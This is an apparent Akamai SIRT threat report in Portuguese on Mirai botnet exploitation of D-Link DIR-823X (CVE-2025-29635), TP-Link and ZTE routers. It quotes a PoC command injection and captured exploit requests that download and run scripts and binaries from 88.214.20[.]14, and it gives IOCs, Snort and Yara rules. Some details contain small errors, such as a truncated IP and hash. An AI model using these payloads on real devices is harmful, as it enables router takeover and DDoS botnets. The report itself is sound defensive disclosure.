Principais conclusões
A Equipe de Inteligência e Resposta em Segurança (SIRT) da Akamai identificou uma exploração ativa da vulnerabilidade de injeção de comandos CVE-2025-29635 em roteadores da série DIR-823X da D-Link. Embora os dispositivos tenham sido descontinuados em 2025, cibercriminosos estão explorando essa falha para distribuir variantes da botnet Mirai.
A SIRT identificou pela primeira vez essa atividade em nossa rede global de honeypots em março de 2026. Essa é a primeira exploração ativa relatada dessas vulnerabilidades desde a divulgação inicial em março de 2025.
Incluímos uma lista de IOCs (Indicators Of Compromise, indicadores de comprometimento) nesta postagem do blog para ajudar na defesa contra essa ameaça.
Descoberta de tentativas de exploração ativa de dispositivos da D-Link
A SIRT da Akamai identificou, no início de março de 2026, tentativas de exploração ativa da vulnerabilidade de injeção de comandos da D-Link, conhecida como CVE-2025-29635, em nossa rede global de honeypots. Esta vulnerabilidade afeta os roteadores da série DIR-823X da D-Link, nas versões de firmware 240126 e 24082, permitindo que um invasor autorizado execute comandos arbitrários em dispositivos remotos ao enviar uma requisição POST para o endpoint /goform/set_prohibiting utilizando a função correspondente. Isso pode resultar na execução remota de comandos.
Análise da falha de firmware CVE-2025-29635
A CVE-2025-29635, divulgada publicamente no final de março de 2025, é uma vulnerabilidade de injeção de comandos que afeta os roteadores da série DIR-823X da D-Link, nas versões de firmware 240126 e 24082. De acordo com um comunicado do fornecedor, esses roteadores não são mais comercializados desde setembro de 2025.
Os pesquisadores de segurança Wang Jinshuai e Zhao Jiangting descobriram e reportaram a falha, além de realizarem a engenharia reversa da função sub_42232C no arquivo binário mostrado na Figura 1. Eles descobriram que o valor da função macaddr é copiado para a variável de comando pela função snprintf, e só então a função system é executada. Ao manipular o valor de macaddr de forma maliciosa, um invasor pode executar comandos ao enviar uma requisição POST para /goform/set_prohibiting.
Fig. 1: Falha de firmware CVE-2025-29635
Os pesquisadores compartilharam uma prova de conceito (PoC) pública sobre uma exploração no GitHub, vinculada à divulgação da CVE, mas ela foi removida posteriormente (Figura 2). No momento em que este artigo foi escrito, esta vulnerabilidade ainda não constava no catálogo de vulnerabilidades exploradas conhecidas da CISA.
POST /goform/set_prohibiting HTTP/1.1
Host: 192.168.122.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Origin: http://192.168.122.130
Connection: close
Referer: http://192.168.122.130/login.html
Cookie: sessionid=00000000000000000000000000000000; token=00000000000000000000000000000000
macaddr=||touch%20/set_prohibiting||&token=00000000000000000000000000000000Dados de honeypot revelam campanhas ativas de botnets
A SIRT da Akamai identificou tentativas de exploração ativa da vulnerabilidade CVE-2025-29635 em nossa rede global de honeypots no início de março de 2026 (Figura 3).
POST /goform/set_prohibiting HTTP/1.1
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
parameter=;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget http://88.214.20[.]14/dlink.sh -O dlink.sh; curl -o dlink.sh http://88.214.20[.]14/dlink.sh; wget http://88.214.20[.]14/dlink.sh; chmod 777 dlink.sh; sh dlink.sh; tftp 88.214.20[.]14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20[.]14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20[.]14 ftp1.sh ftp1.sh; sh ftp1.sh;Grande parte da solicitação mostrada na Figura 3 é semelhante à exploração da PoC apresentada na Figura 2, mas existem algumas diferenças importantes. Em primeiro lugar, essa tentativa não inclui alguns cabeçalhos, como Referer e Accept-Language. Ela não fornece autenticação na forma de tokens ou IDs de sessão, seja no cabeçalho ou no corpo.
No entanto, parece que o firmware não consegue verificar a presença ou a validade desses campos e valores. Com essa falha, o roteador extrai o valor presente no buffer de comando diretamente do corpo da solicitação, sem verificar de qual campo do formulário ele foi originado. Se o analisador considerar qualquer par de chave e valor no corpo da mensagem como um candidato para o campo macaddr, ou se ele simplesmente copiar todo o conteúdo para o buffer, um invasor poderá fornecer um código malicioso com qualquer nome arbitrário, como um parâmetro.
Portanto, embora esta tentativa de exploração apresente algumas diferenças significativas em relação à exploração da PoC, ela ataca o mesmo trecho vulnerável do código e aciona a mesma chamada system(), que executa a sequência de comandos fornecida ao shell.
Análise técnica da variante Mirai
O script de shell carregado durante a tentativa de ataque é bastante simples e direto, e tem como objetivo baixar e executar um payload malicioso da Mirai, chamado "tuxnokill", compatível com várias arquiteturas e distribuído a partir do mesmo endereço IP do downloader: 88.214.20[.]14. O malware em si parece ser uma típica variante de malware Mirai com codificação XOR e uma chave de descriptografia 0x30. Ele também tem uma string de execução de console codificada, que é padrão com payloads Mirai, de "falha de segmentação (núcleo despejado)", bem como um IP de download codificado. Com base em conexões de sandbox, o endereço IP de comando e controle é 64.89.161[.]130, com uma porta 44300.
Ao contrário de alguns outros invasores que estão começando a executar o vibe coding de payloads, presumimos que esse agente de ameaça codificou sua payload da maneira antiga, dada a string codificada "AI.NEEDS.TO.DIE" em seu malware. Os comandos de ataque observados no malware são bastante comuns (Figura 4).
TCP STOMP
TCP ACK
TCP SYN
STD
GRE ETH
UDP DNS
UDP VSE
UDP PLAIN
UDP GENERIC
RAW
XMAS
HTTP NULLExploração observada das vulnerabilidades TP-Link e ZTE
Além de se concentrar na CVE-2025-29635, observamos esse agente de ameaça tentando explorar duas outras vulnerabilidades em nossa rede de honeypots: CVE-2023-1389 (Figura 5), que afeta os dispositivos TP-Link Archer AX21, e uma exploração de execução remota de código (RCE) em um roteador ZTE ZXV10 H108L (Figura 6).
POST /cgi-bin/luci/;stok=/local?form=country HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id>curl -o tplinkwan.sh http://88.214.20[.]14/tplinkwan.sh; wget http://88.214.20[.]14/tplinkwan.sh; chmod 777 tplinkwan.sh; sh tplinkwan.sh; tftp 88.214.20[.]14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20[.]14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20[.]14 ftp1.sh ftp1.sh; sh ftp1.sh)POST /manager_dev_ping_t HTTP/1.1
Host: honeypot_ip:8083
User-Agent: Go-http-client/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&Host=;$(cd /tmp;wget http://88.214.20[.]14/bins/tux.mips; chmod 777 tux.mips; ./tux.mips zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submitConclusão
As campanhas de malware Mirai continuam atormentando o setor, com grande parte do código-fonte original ainda sendo reutilizado por vários agentes de ameaças, tanto qualificados quanto não qualificados. A facilidade de acesso e os potenciais benefícios financeiros são alguns dos fatores que podem atrair pessoas a entrarem no mundo das botnets e se tornarem invasores cibernéticos.
Embora o invasor em questão seja totalmente contra a IA, muitos outros a verão como uma ferramenta útil para fins nefastos. Seja ajudando-os a codificar malware ou identificar novas vulnerabilidades a serem exploradas, o potencial da IA está presente, tanto para os agentes de ameaças quanto para os especialistas em defesa cibernética.
Muitos cibercriminosos que atuam no campo das botnets frequentemente exploram vulnerabilidades antigas. Especialmente quando existem explorações públicas de PoCs para essas vulnerabilidades, os invasores podem incorporá-las facilmente em seus vetores de exploração.
Infelizmente, muitas organizações em todo o mundo configurarão dispositivos de forma inadequada, falharão em fazer o patch em tempo hábil ou continuarão usando dispositivos vulneráveis que foram descontinuados, como no caso dos roteadores da série 823X da D-Link. É altamente recomendável que as organizações monitorem regularmente as divulgações de vulnerabilidades que são relevantes para sua infraestrutura e apliquem os devidos patches, atualizações e proteções para garantir sua própria segurança operacional.
Acompanhe-nos
A SIRT da Akamai continuará monitorando e relatando ameaças como essa para nossos clientes e para a comunidade de segurança em geral. Para acompanhar a SIRT e outras publicações do Akamai Security Intelligence Group, confira nossa página inicial de pesquisa e siga-nos nas redes sociais.
IOCs
Incluímos uma lista de IOCs, bem como regras do Snort e Yara, para ajudar os defensores.
Regras Snort para IPs
alert ip any any -> [88.214.20.14, 64.89.161.130] any (
msg:"Possible Botnet Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)Regras Yara para amostras de malware
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2026-03-27"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$string1 = "segmentation fault (core dumped)"
$string2 = “AI.NEEDS.TO.DIE”
$ip1 = "88.214.20.14"
$ip2 = "64.89.161.13"
$hash1 = "32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100"
$hash2 = "be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b"
$hash3 = "d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7"
$hash4 = "7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8"
$hash5 = "72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8"
condition:
(
$string1 or
$string2 or
$ip1 or
$ip2 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5
)
}Endereços IPv4 maliciosos
88.214.20.14
64.89.161.130
Hashes SHA256
2ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100
be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b
d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7
7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8
72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8
Tags
